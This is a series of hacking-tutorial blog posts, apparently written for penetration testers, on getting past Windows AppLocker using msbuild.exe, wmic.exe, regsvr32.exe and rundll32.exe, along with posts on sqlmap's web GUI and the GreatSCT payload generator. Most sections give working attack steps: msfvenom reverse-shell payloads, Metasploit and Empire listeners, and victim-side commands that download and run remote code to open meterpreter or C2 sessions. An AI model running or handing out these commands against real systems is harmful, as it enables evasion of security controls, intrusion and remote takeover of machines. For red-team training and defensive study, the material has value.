Bypass Application Whitelisting using msbuild.exe (Multiple Methods)

January 21, 2019, 11:39 pm

≫ Next: Configure Sqlmap for WEB-GUI in Kali Linux

≪ Previous: Bypass Application Whitelisting using mshta.exe (Multiple Methods)

$

0

0

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with MSbuild.exe.

Table of Content

Introduction to MSbuild.exe

Exploiting Techniques

§  Generate CSharp file with Msfvenom

§  Generate XML file to Exploit MSbuild

§  Nps_payload Script

§  Powershell Empire

§  GreatSCT

Introduction to MSbuild.exe

The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software. Visual Studio uses MSBuild, but it doesn't depend on Visual Studio. By invoking msbuild.exe on your project or solution file, you can organize and build products in environments where Visual Studio isn't installed.

Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio (.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code.

Exploiting Techniques:

Generate CSharp file with Msfvenom

We use Microsoft Visual Studio to create C # (C Sharp) programming project with a *.csprojsuffix that saved in MSBuild format, so that it can be compiled with the MSBuild platform into an executable program.

With the help of a malicious build we can obtain a reverse shell of victim’s machine. Therefore, now we will generate our file.csproj file and for that, first generate a shellcode of c# via msfvenom. Then later that shellcode will be placed in our file.csproj as given below.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp

The shellcode above should be placed in the XML file and you can download this XML file from github, which has the code that the MSBuild compiles and executes. This XML file should be saved as. file.csproj and must be run via MSBuild to get a Meterpreter session.

Note: Replace the shellcode value from your C# shellcode and then rename buf as shellcode as shown in the below image. 

You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can compile an application to run on any one of several versions of the .NET Framework. For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile to more than one framework is named multitargeting.

To know more about MSbuild read from here: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015

Now launch multi handler to get meterpreter session and run the file.csproj file with msbuild.exe at the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj

Note: you need to save your malicious payload (XML / csproj) at this location: 

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute this file with command prompt.

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Generate XML file to Exploit MSbuild

As said above that MSBuild uses an XML-based project file format that's straightforward and extensible, therefore we can rename above generated file.csproj as file.xml and again run the file.xml file with msbuild.exe at the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Nps_payload Script

This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. Written by Larry Spohn (@Spoonman1091) Payload written by Ben Mauch (@Ben0xA) aka dirty_ben. You can download it from github.

Nps_payload generates payloads that could be execute with msbuild.exe and mshta.exe to get reverse connection of victim’s machine via meterpreter session.

Follow the below step for generating payload:

1.       Run ./nps_payload.py script, once you have downloaded nps payload from github.

2.       Press key 1 to select task “generate msbuild/nps/msf”

3.       Again Press key 1 to select payload “windows/meterpreter/reverse_tcp”

This will generate a payload in XML file, send this file at target location C:\Windows\Microsoft.Net\Framework\v4.0.30319 as done in previous method and simultaneously run below command in a new terminal to start listener.

msfconsole -r msbuld_nps.rc

Now repeat above step to execute msbuild_nps.xml with command prompt and obtain a reverse connection via meterpreter as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml

PowerShell Empire

For our next method of HTA Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our hta tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empipre framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :

uselistner http

set Host http://192.168.1.107

set port 80

execute

With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your powershell.

For our Msbuild attack we will use stager.  A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/launcher_xml

set listener http

execute

Usestager will create a malicious code file that will be saved in the /tmp named launcher.xml.

And once the file runs, we will have the result on our listener. Run the file in your victim’s by typing following command :

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\

MSBuild.exe launcher.xml

To see if we have any session open type ‘agents’. Doing so, will show you the name of the session you have. To access that session type :

interact A8H14C7L

The above command will give you the access to the session.

sysinfo

info

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

use Bypass

Now to see the list of payloads type :

list

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use msbuild/meterpreter/rev_tcp.py

Once the command is execute, type :

set lhost 192.168.1.107

generate

When generating the payload, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. We had given msbuild as payload name where the output code will be save in XML.

Now, it made two files. One metasploit RC file and other an msbuild.xml file.

Now, firstly, start the python’s server in /usr/share/greatsct-output/source by typing:

python -m SimpleHTTPServer 80

Run the file in your victim’s by typing following command:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\

MSBuild.exe msbuild.xml

Simultaneously, start the multi/handler using recourse file. For this, type :

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! We have meterpreter session as shown here.

Reference: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017

---

Configure Sqlmap for WEB-GUI in Kali Linux

January 22, 2019, 4:28 am

≫ Next: Bypass Application Whitelisting using wmic.exe (Multiple Methods)

≪ Previous: Bypass Application Whitelisting using msbuild.exe (Multiple Methods)

$

0

0

Hello everyone and welcome to this tutorial of setting up SQLMAP for web-gui. Web-GUI simply refers to the interface that a browser provides you over the http/https service.

SQLMAP is a popular tool for performing SQL injection attacks on sites affected by mysql errors; be it an error based sql injection or hidden sql, sqlmap is the biggest tool there is for SQL injection attacks. But very few people know that sqlmap also provides an API for it’s service that is written in python that we can use to develop a front end for the same sqlmap which is on command line interface.

One such person is Hood3dRob1n(https://github.com/Hood3dRob1n/SQLMAP-Web-GUI) who has created a PHP based front end for sqlmap and today, we’ll be setting it up in Kali Linux. It is needless to say, it will be compatible with any Linux distro.

Let’s get started.

Table of contents:

1. Cloning the github repository and giving necessary permissions

2. Locating and hosting the API

3. Launching the front end

4. Attacking practice lab for SQLi

Cloning the github repository

First, we need to clone the Hood3dRob1n repository. To clone, we’ll use the git clone command and put the folder named sqlmap inside “/var/www/html.”

git clone https://github.com/Hood3dRob1n/SQLMAP-Web-GUI

cd SQLMAP-Web-GUI

mv sqlmap ..

cd ..

chmod 777 sqlmap

Locating and hosting the API

The next step is to host an apache server. If you don’t have apache pre installed, you can install it with apt-get install apache2 command.

After we have hosted the Apache server, we need to run the sqlmapapi.

The default folder would vary with multiple linux distros, so we used the locate command to locate the file named “sqlmapapi.py”

We need to run this API using the command:

python usr/share/sqlmapapi.py -s

Launching the front end

If you have followed this tutorial so far, you’ll see the following screen when you open localhost/sqlmap

And voila! Just like that you are good to start injecting SQL queries.

Attacking practice lab for SQLi

There are 6 tabs essentially here.

·         BASIC: This tab allows you to set the URL to test SQL injections. You can set HTTP method too. Given options are POST, PUT, HEAD etc.

·         REQUEST: Allows you to modify your request with optional parameters like time delay, timeout between requests, no. of retries to connect, user agent etc.

·         INJECTION & TECHNIQUE: Lets you choose which kind of injection and techniques you are applying-- Boolean based, error based, inline etc. as well as other options like use of DBMS hex functions for data retrieval, kind of database (MYSQL or MSSQL) and so on.

·         DETECTION: To set a custom string to match.

·         ENUMERATION: What data to retrieve. Eg: current user and current database dump. Or if you are feeling fancy, all users all data dump. You can play around with it.

·         ACCESS: Access parameters. Leave this at default if you don’t know your way around it.

We will set the parameters one by one as we proceed. But we never attack on live websites, hence, we used another PC with an IP address of 192.168.1.105 to host a practice lab for SQL injection attacks called SQL-Dhakkan. Refer to this article to know how you can set it up yourself!

If you are successful to set up the lab, you’ll get a screen something like this:

I am on Lesson 1 currently and I know that id=1 has an error based SQLi vulnerability. So, let’s copy this URL to our web-gui sqlmap.

It is highly recommended that you get yourself familiar with HTTP methods and read how to manually attack SQLi here because it will give you a profound idea of the options we will be selecting further in the tutorial. But if you wish to continue with the tutorial instead, who am I to stop you!

Go to the enumeration tab and select the methods that you want to test.

Once set, set the type of SQLi you want to perform.

Once you are satisfied with the choices you input, run the scan!

For the purpose of this tutorial we have performed a really basic scan that tells us the current database and hostname, but you can play around with the parameters as you like.

Conclusion: Web based GUI for sqlmap is definitely a plus point over the traditional sqlmap for many reasons, one of them being the ease of access. There is no need to remember such long commands. Drag, drop and done!

Plus, web-based GUI is nothing but a web app for you. A web app that runs sqlmap, isn’t it great?

Hope you enjoyed this little tutorial.

Bypass Application Whitelisting using wmic.exe (Multiple Methods)

January 23, 2019, 12:24 am

≫ Next: Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)

≪ Previous: Configure Sqlmap for WEB-GUI in Kali Linux

$

0

0

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with wmic.exe.

Table of Content

Introduction to Wmic.exe

Exploiting Techniques

·         Koadic

·         Powershell Empire

·         Link hta within XSL code

Wmic.exe

The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such as system settings, stop processes and execute scripts locally or remotely. Therefore, it can invoke XSL script (eXtensible Stylesheet Language).

Exploiting Techniques

Koadic

We will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to Metasploit and Powershell Empire.

To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation gets completed, you can run ./koadic file to start koadic and start with loading the sta/js/wmic stager by running the following command and set SRVHOST where the stager should call home.

use stager/js/wmic

set SRVHOST 192.168.1.107

run

Execute WMIC following command to download and run the malicious XSL file from a remote server:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file will get executed on target machine, you will have a Zombie connection just like metasploit.

PowerShell Empire

For our next method of wmic Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our xsl tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empipre framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :

uselistner http

set Host http://192.168.1.107

set port 80

execute

With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your powershell.

For our Msbuild attack we will use stager.  A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/launcher_xml

set listener http

execute

Usestager will create a malicious code file that will be saved in the /tmp named launcher.xml.

We have use python http server to transfer this file inside victim’s machine

And once the file runs, we will have the result on our listener. Run the file in your victim’s by typing following command:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

To see if we have any session open type ‘agents’. Doing so, will show you the name of the session you have. To access that session type :

interact Z639YHPA

sysinfo

Link hta within XSL code

As we know, wmic can execute any file or script remotely, so we will link a hta file within XSL code. An XSL file will contain a link, to download and execute a malicious hta file via mshta.exe, which is officially tiggered by wmic.

Therefore, let’s generate an hta file with the help of Metasploit:

use exploit/windows/misc/hta_server

msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109

msf exploit(windows/misc/hta_server) > exploit

Now copy the URL and place inside the XSL code, because they have ability to execute language script of Micorsoft.

Then, we have created a “payload.xsl “file, you can take help from this linkfor writing XSL code and then place the link of hta file as shown below.

Now again we need to execute XSL file through wmic.exe with the help of following command:

wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"

Once the above command is executed you will have a session open. To access the session, type:

sessions 1

Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)

January 23, 2019, 1:45 am

≫ Next: Bypass Application Whitelisting using rundll32.exe (Multiple Methods)

≪ Previous: Bypass Application Whitelisting using wmic.exe (Multiple Methods)

$

0

0

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with regsvr32.exe.

Tables of content

·         Introduction to regsvr

·         Working of regsvr

·         Multiple  methods to attack regsvr

Introduction

Regsvr32 stands for Microsoft Register Server. It is a windows command-line utility tool. While regsvr32 causes problems sometimes; it’s an important file as its windows system file. The file is found in the subfolder of C:\Windows. This file is able to observe, track and influence other programs. It’s mainly used to register and unregister programs in windows. File extension for this is .exe and its process widely assists OLE (Object Linking and embedding), DLL (Data Link Libraries) and OCX (ActiveX control modules). The said process works in the background and can be seen via task manager. Its Microsoft's one of the trusted files.

Working

Information about programs associated with regsvr32 is added to windows, when you register a DLL file in regsvr32. These defences are then accessed to understand where the program data is and how to interact with it. As while registering a DLL file, information is added to central to directory so that it can be used by the windows. The whole path of these files literally has the executable code and due to this windows can call upon specific functions and use them to call executable code. These files are very convenient as when a software is updated, these file automatically call upon the updated version; in short it helps avoid the version problems of a software. Usually this file is not commonly used except for registering and unregistering DLL files.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] 

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Multiple Methods

·         Web delivery

·         Empire

·         Manual

·         MSFVenom

·         Koadic

·         JSRat

·         GreatSCT

Web Delivery

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.

Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 3

msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.1.109

msf exploit (web_delivery)>set srvhost 192.168.1.109

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below:

Once the exploit is running; you will have a URL made for you. Run that URL in the command prompt of the Victim’s PC as shown below:

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

Once you hit enter after the command, you will have your session. Type ‘sysinfo’ for the information of the PC as shown in the image below:

PowerShell Empire

For our next method of regsvr Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our .sct tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire àhttps://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empire framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener, type :

uselistner http

set Host http://192.168.1.109

execute

With the above commands, you will have an active listener. Type back to go out of listener so you can initiate your powershell.

Once you are out the listener, you need to use an exploit to create your malicious file. A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. Which means to create an exploit, we will have to use stager. Therefore, type :

usestager windows/launcher_sct

set listener http

execute

After the execution of execute command, usestager will create a launcher.sct in /tmp. Now to get session start the python server by typing:

python -m SimpleHTTPServer 8080

As the server is on, the only step left is to execute our malware in the victim’s PC. For this, type the following command in the command prompt :

regsvr /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll

In the above command we have used port 8080 because our server of python is activated on the same port.

Once the above is executed as told, you will receive a session. To access the session type :

interact 9ATUX4M7

here,

9ATUX4M7 : is a agent/session name. this will vary from session to session.

Inject PowerShell code in sct File (Manual Method)

Our next method manual with a help of an exploit. The exploit we will use will help us to create a powershell code. So let’s first create our powershell and for this go to the terminal of kali and type :

After running this exploit, it will show you the powershell code on the terminal screen as shown in following image :

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.1.109

msf exploit (web_delivery)>set srvhost 192.168.1.109

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below:

Now we need to create .sct file in order for our attack to run. We found a script online to create a .sct file. You can access the link for the script by clicking  here. The script is shown in image below :

Copy the powershell code which was created by web_delivery and paste it in the above script where it says “calc.exe” as shown in the image below and then finally save it with .sct extension.

Then repeat above step to run .sct file with regsvr32.exe in the victim’s PC:

regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll

As soon as the above command is executed, you will have your session through web_delivery. To access the sessioni type ‘sessions 1’ and ‘info’ to have basic information of the system.

MsfVenom

Our next method is to use msfvenom. Through this method we will create a two .sct, one to download our malware and another to execute it.  But first let’s get going with msfvenom and for that type :

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Start up the python server using following command:

python -m SimpleHTTPServer 80

And simultaneously, in the same script, used in the previous method inject certutil.exe command to call the shell.exe file from remote server. Therefore, instead of “calc .exe” write the following and save file again with .sct extension:

“certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe”

We have used curtutil here as it allows to download a file in windows and also saved file as 3.sct.

Now, run the above script using following command:

regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct scrobj.dll

We will create another file to execute our previous file “shell.exe”. For that again take the same script and where its written “calc.exe”; therefore write :

“cd /k cd c:\Users\raj & shell.exe”

This we have saved script as 4.sct and again run this script using the following command :

regsvr32 /u /n /s /i:http;//192.168.1.109/4.sct scrobj.dll

Side by side start up the multi handler too, to get a session. Hence, type :

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

After running the command in victim’s PC, u will have meterpreter session.

Koadic

Our next method is using Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type:

use stager/js/regsvr

set srvhost 192.168.1.107

run

After this, type the following in the command prompt of the victim’s:

regsvr32 /u /n /s /i:http;//192.168.1.107:9998/uWBjv scrobj.dll

Once you run the above command, you will have a session. To access the session type :

zombie 0

JSRat

Our next method of attacking regsvr32 is by using JSRat and you can download it from github. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a webserver and on that webserver we will find our .sct file. To use this method type:

./JSRat.py -I 192.168.1.107 -p 4444

Running the above command will start webserver.

Open this in your browser as shown below. Here, you will find the .sct file that you need to run on your victim’s PC.

As we have got the command, run the command in the run window as shown in the image below:

After executing the command in the run window you will have a session as shown:

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from https://github.com/GreatSCT/GreatSCT

Once its downloaded and running, type the following command to access the modules :

use Bypass

Then type ‘list’  to get the list of modules.

List of modules will appear as shown in image below :

From the list of modules choose the following :

use regsvr/shellcode_iject/base64_migrate.py

generate

After the above commands, type 1 to choose MSFVenom

Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcpas a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the give port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you a name for your malware. By defualt it will set name ‘payload’ so either your can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of then will a resource file ad other will be .sct file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing :

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below.

Simultaneously, start the multi/handler using recourse file. For this, type :

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And you have meterpreter session.

Conclusion

Using regsvr32 to gain a session is write unusual way but it’s very important. And so above mentioned methods uses different tools and software to allow us to perform this attack.

Bypass Application Whitelisting using rundll32.exe (Multiple Methods)

January 24, 2019, 4:19 am

≫ Next: GreatSct - An Application Whitelist Bypass Tool

≪ Previous: Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)

$

0

0

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with RunDLL files.

Tables of Content

·         Introduction

·         Working of DLL files

·         Advantages

·         Disadvantages

·         Different methods for AppLocker Bypass using DLL files

·         Conclusion

Introduction

DLL files and their Importance for window’s OS to work and it also determines the working of other programs that customises your windows. Dynamic Link Library (DLL) files are the type of file which provides instructions to other programs on how to call upon certain things. Therefore, multiple software’s can share such DLL files, even simultaneously. In spite of being in the same format as .exe file, DLL files are not directly executable like .exe files. DLL file extensions can be : .dll(Dynamic Link Library), .OCX(ActiveX Controls), .CPL(Control Panel), .DRV(Device Drivers).

Working

When in use, DLL files are divided into sections. This makes working of DLL files easy and faster. Each section is installed in main program at run time. As each section is different and independent; load time is faster and is only done when the functionality of the said file is required. This ability also makes upgrades easier to apply without affecting other sections. For example: you have a dictionary program and new words are added every month, so for this all you have to do is update it; without requiring to install a whole another program for it.

Advantages

·         Uses fewer resources

·         Promotes modular architecture

·         Eases deployment and installation

Disadvantages

·         A dependent DLL is upgraded to a new version.

·         A dependent DLL is fixed.

·         A dependent DLL is overwritten with an earlier version.

·         A dependent DLL is removed from the computer.

Methods

·         Smb_Delivery

·         MSFVenom

·         Koadic

·         JSRat

So, our method is using smb_delivery. To use this method, open the terminal in kali and type the following commands ;

msfconsole

use exploit/windows/smb/smb_delivery

msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107

msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe in the windows machine to obtain meterpreter sessions.

As the above code will run, it will provide you with a command that is to be executed on the victim’s PC; in order to get a session. So copy and paste the said command in the run window of the victim’s PC as shown in the image below:

rundll3.exe \\192.168.1.107\ZtmW\test.dll,0

As soon as the command is executed, you will have your meterpreter session. To access the session type :

sessions 1

sysinfo

MSFVenom

Our second method is via MSFVenom. For the utilisation of this method, type the following command in the terminal of kali :

msfvenom -p windows/meterpreter.reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll

Once the payload is created, run the following command in the run window of victim’s PC:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

Simultaneously, start the multi/handler to get a session by typing :

msfconsole

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.107

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

Koadic

Our next method is using Koadic framework. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type:

use stager/js/rundll32_js

set SRVHOST 192.168.1.107

run

Running the exploit will give you a command. Copy that command from rundll32.exe to 6.0”) and paste it in the command prompt of the victims’ PC.

Once you run the command in the cmd, you will have your session. As shown in the following imgae.

To access the session type :

zombies 0

Now the dilemma is, what to do if command prompt is blocked in victim’s PC.

If the command line is blocked, there is script developed by Didier Stevens. You can find them in the following link :

http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

By executing the above URL, you will download a zip file. Extract that zip file and use the following command to run the said file in run windows:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

As soon as you run the command, you will have unblocked the cmd. As shown below:

JSRat

Our next method of attacking regsvr32 is by using JSRat and you can download it from github. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a webserver and on that webserver we will find our .sct file. To use this method type:

./JSRat.py -I 192.168.1.107 -p 4444

Once JSRat starts working, it will give you a link to open in browser. That webpage will have a code which is to be executed on the victim’s pc.

Therefore, open the http://192.168.1.107/wtf link in your browser. There you will find the said code as shown in the image below:

Run that code in the command prompt of the victims’ PC as shown:

And voila, you will have a session as the image below:

Conclusion

DLL files are collection of various codes and procedure held together. These files helps windows programs to execute accurately. These files were created for multiple programs to use them simultaneously. This technique helps in memory conservation. Therefore these files are important and required by windows to run properly without giving users any kind of problems. Hence, exploitation through such files is very efficient and lethal. And above presented methods are the different ways to do it.

GreatSct - An Application Whitelist Bypass Tool

January 25, 2019, 11:30 pm

≫ Next: Exploiting Windows PC using Malicious Contact VCF file

≪ Previous: Bypass Application Whitelisting using rundll32.exe (Multiple Methods)

$

0

0

While wrting Applocker bypass series, we found a new tool which was especially design for bypassing whitelisting application.  So Idecided to write this article where e are introducing another most interesting tool “Great SCT –A metasploit payload generator” tool which is similar to unicorn or msfvenom because it depeands on metasploit framework to provide reverse connection of victim’s machine. So let’s began with its tutorial and check its functionality.

Table of Content

§  GreatSCT

§  Installation & Usages

§  Generate malicious hta file 

§  Generate malicious sct file 

§  Generate malicious dll file 

GreatSCT

GreatSCT is current under support by @ConsciousHacker, the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team. It is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

You can download it from here: https://github.com/GreatSCT/GreatSCT

Installation & Usages

It must first be downloaded and installed in order to start using Great SCT. Run following command to download Great SCT from github and also take care of its dependency tools while installing it.

This help to bypass Applocker policy by using following tools:

§  Installutil.exe The Installer tool is a command- line tool that lets you to install and uninstall server resources in specific assemblies by running the installer components.

§  Msbuild.exe : The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild.

§  Mshta.exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with.

§  Regasm.exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently. 

§  Regsvcs.exe : RegSvcs stands for Microsoft .NET Remote Registry Services it is known for .NET Services Installation.

§  Regsvr32.exe : Regsvr32 is a command line utility for register and unregister OLE controls in the Windows Registry, such as DLLs and ActiveX controls.

git clone https://github.com/GreatSCT/GreatSCT.git

cd GreatSCT

cd setup

./setup.sh

Once it’s downloaded and running, type the following command to access the help commands:

use Bypass

Now to get the list of payloads type :

list

Generate malicious hta file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use mshta/shellcode_inject/base64_migrate.py

Once the command is execute, type :

generate

After executing generate command, it asks you which method you want to use. As we are going to use msfvenom type 1 to choose first option. Then press enter for meterpreter. Then provide lhost and lport i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. As I didn’t wanted to give any name, I simply pressed enter.

Now, it made two files. One resource file and other an hta file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the hta file in the command prompt of the victim’s PC.

mshta.exe http://192.168.1.107/payload.hta

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using mshta.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious sct file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use regsvr/shellcode_iject/base64_migrate.py

Once the command is execute, type :

generate

